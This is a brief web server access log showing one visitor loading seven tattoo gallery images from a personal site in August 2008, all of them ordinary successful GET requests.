74.32.91.70 - - [06/Aug/2008:23:43:28 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:28 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:28 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:29 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:29 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:29 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.32.91.70 - - [06/Aug/2008:23:43:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
